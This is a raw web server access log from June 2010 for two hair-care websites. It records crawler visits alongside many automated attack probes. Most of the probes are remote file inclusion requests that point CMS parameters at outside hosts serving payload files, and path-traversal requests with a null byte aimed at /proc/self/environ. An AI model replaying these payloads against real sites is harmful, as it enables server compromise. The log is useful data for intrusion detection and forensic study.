190.152.145.54 - - [06/Jun/2010:22:56:17 -0700] "GET /logs/access_100329.log%20%20//index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:56:17 -0700] "GET /logs//index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17215 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6323 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7662 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8816 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9848 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9876 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:56:38 -0700] "GET /logs/access_100329.log%20%20//index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:56:38 -0700] "GET /logs//index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:56:38 -0700] "GET /index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:58:11 -0700] "GET /logs/access_100329.log//index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:58:15 -0700] "GET /logs/access_100329.log//index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.130.32.50 - - [06/Jun/2010:23:04:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
119.63.193.75 - - [06/Jun/2010:23:06:51 -0700] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
119.63.193.75 - - [06/Jun/2010:23:08:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6472 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
85.114.130.150 - - [06/Jun/2010:23:21:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://cisco-gbics-glc-sx-mm.in" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "growlonghairfast.com"
85.114.130.150 - - [06/Jun/2010:23:21:39 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:23:27:52 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fighterarcade.com/xml/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:23:27:52 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fighterarcade.com/xml/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:23:27:52 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fighterarcade.com/xml/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:23:30:27 -0700] "GET /logs/access.log%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fighterarcade.com/xml/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
202.130.32.50 - - [06/Jun/2010:23:39:57 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
202.130.32.50 - - [06/Jun/2010:23:39:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
202.130.32.50 - - [06/Jun/2010:23:39:58 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
61.109.245.22 - - [06/Jun/2010:23:42:52 -0700] "GET /write_update.php?board_skin_path=http://generalecology.com/admin/bulkprice/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
62.67.244.57 - - [06/Jun/2010:23:44:50 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
174.133.201.194 - - [06/Jun/2010:23:46:00 -0700] "GET /*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
62.67.244.57 - - [06/Jun/2010:23:46:52 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
174.133.201.194 - - [06/Jun/2010:23:47:26 -0700] "GET /*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
67.195.37.176 - - [06/Jun/2010:23:50:51 -0700] "GET /tmp/?D=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
174.120.153.34 - - [06/Jun/2010:23:52:22 -0700] "HEAD / HTTP/1.1" 200 0 "http://www.fresharticleshub.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.freehairsecrets.com"
174.133.201.194 - - [06/Jun/2010:23:52:35 -0700] "GET /logs/access.log/*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [06/Jun/2010:23:52:36 -0700] "GET /*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [06/Jun/2010:23:52:36 -0700] "GET /logs/*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.133.201.194 - - [06/Jun/2010:23:53:15 -0700] "GET /logs/access.log/*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.133.201.194 - - [06/Jun/2010:23:53:15 -0700] "GET /*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.133.201.194 - - [06/Jun/2010:23:53:16 -0700] "GET /logs/*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
202.130.32.50 - - [06/Jun/2010:23:54:23 -0700] "GET /logs/access_100125.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.214.44.233 - - [06/Jun/2010:23:58:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "growlonghairfast.com"
91.214.44.233 - - [06/Jun/2010:23:58:48 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "growlonghairfast.com"
91.121.75.82 - - [07/Jun/2010:00:04:35 -0700] "GET /logs//include/lib.inc.php?site_path=http://halonight.net/xml/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
91.121.75.82 - - [07/Jun/2010:00:04:35 -0700] "GET /include/lib.inc.php?site_path=http://halonight.net/xml/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
91.121.75.82 - - [07/Jun/2010:00:04:35 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://halonight.net/xml/.log? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.freehairsecrets.com"
202.130.32.50 - - [07/Jun/2010:00:04:55 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
202.130.32.50 - - [07/Jun/2010:00:04:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
202.130.32.50 - - [07/Jun/2010:00:04:56 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
62.67.244.57 - - [07/Jun/2010:00:05:22 -0700] "GET /logs/scripts.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.67.244.57 - - [07/Jun/2010:00:05:22 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.67.244.57 - - [07/Jun/2010:00:05:23 -0700] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.67.244.57 - - [07/Jun/2010:00:05:35 -0700] "GET /logs/access.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
174.133.201.194 - - [07/Jun/2010:00:06:57 -0700] "GET /logs/access_100125.log/*?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:16:27 -0700] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:16:27 -0700] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:16:27 -0700] "GET /logs/access.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:16:38 -0700] "GET /logs/access.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:16:38 -0700] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:16:41 -0700] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:20:01 -0700] "GET /logs/access_100510.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:20:17 -0700] "GET /logs/access_100510.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.218.116.134 - - [07/Jun/2010:00:27:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
121.88.4.141 - - [07/Jun/2010:00:28:45 -0700] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [07/Jun/2010:00:28:45 -0700] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [07/Jun/2010:00:28:48 -0700] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [07/Jun/2010:00:28:48 -0700] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [07/Jun/2010:00:28:48 -0700] "GET /logs/access.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.141 - - [07/Jun/2010:00:28:52 -0700] "GET /logs/access.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.164.97 - - [07/Jun/2010:00:34:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.164.97 - - [07/Jun/2010:00:34:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.35.17 - - [07/Jun/2010:00:34:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
94.23.35.17 - - [07/Jun/2010:00:35:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.25.154.162 - - [07/Jun/2010:00:35:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.209.177.98 - - [07/Jun/2010:00:35:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.209.177.98 - - [07/Jun/2010:00:35:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.209.177.98 - - [07/Jun/2010:00:35:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
75.25.154.162 - - [07/Jun/2010:00:36:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.23.35.17 - - [07/Jun/2010:00:36:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
91.121.164.97 - - [07/Jun/2010:00:36:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.35.17 - - [07/Jun/2010:00:36:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
66.209.177.98 - - [07/Jun/2010:00:36:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
91.121.164.97 - - [07/Jun/2010:00:36:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
75.25.154.162 - - [07/Jun/2010:00:36:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.25.154.162 - - [07/Jun/2010:00:36:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
61.109.245.22 - - [07/Jun/2010:00:36:54 -0700] "GET /logs/scripts.log/write_update.php?board_skin_path=http://generalecology.com/admin/bulkprice/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
61.109.245.22 - - [07/Jun/2010:00:36:54 -0700] "GET /write_update.php?board_skin_path=http://generalecology.com/admin/bulkprice/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
61.109.245.22 - - [07/Jun/2010:00:36:55 -0700] "GET /logs/write_update.php?board_skin_path=http://generalecology.com/admin/bulkprice/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [07/Jun/2010:00:41:26 -0700] "GET /logs/access.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.180.154.112 - - [07/Jun/2010:00:41:42 -0700] "GET / HTTP/1.1" 200 926 "-" "-" "www.growlonghairfast.com"
59.180.154.112 - - [07/Jun/2010:00:41:43 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)" "www.growlonghairfast.com"
59.180.154.112 - - [07/Jun/2010:00:41:45 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)" "www.growlonghairfast.com"
91.121.164.97 - - [07/Jun/2010:00:45:40 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.164.97 - - [07/Jun/2010:00:45:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.164.97 - - [07/Jun/2010:00:45:40 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.35.17 - - [07/Jun/2010:00:45:56 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
94.23.35.17 - - [07/Jun/2010:00:45:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
94.23.35.17 - - [07/Jun/2010:00:45:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.164.97 - - [07/Jun/2010:00:46:51 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.164.97 - - [07/Jun/2010:00:46:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.164.97 - - [07/Jun/2010:00:46:52 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.35.17 - - [07/Jun/2010:00:46:56 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
94.23.35.17 - - [07/Jun/2010:00:46:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
94.23.35.17 - - [07/Jun/2010:00:46:56 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
66.209.177.98 - - [07/Jun/2010:00:48:15 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.209.177.98 - - [07/Jun/2010:00:48:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.209.177.98 - - [07/Jun/2010:00:48:15 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
75.25.154.162 - - [07/Jun/2010:00:48:16 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
